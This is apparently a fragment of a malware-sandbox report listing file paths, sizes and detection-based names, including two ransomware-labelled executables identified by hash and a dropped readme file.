                            • C:\Windows\WinSxS\amd64_windows-shield-provider_31bf3856ad364e35_10.0.19041.84_none_9d98e005fb7852ca\WindowsSecurityIcon.png

                              Filesize

                              816B

                            • F:\$RECYCLE.BIN\S-1-5-21-3227495264-2217614367-4027411560-1000\Readme.README

                              Filesize

                              532B

                            • \??\c:\users\admin\desktop\00403\heur-trojan-ransom.msil.encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe

                              Filesize

                              878KB

                            • \??\c:\users\admin\desktop\00403\heur-trojan-ransom.win32.foreign.vho-c3aa5acfc410447b8295039ab0721db78b4cc2a0f9773e63c3afbf2d98e57f2f.exe

                              Filesize

                              8.1MB
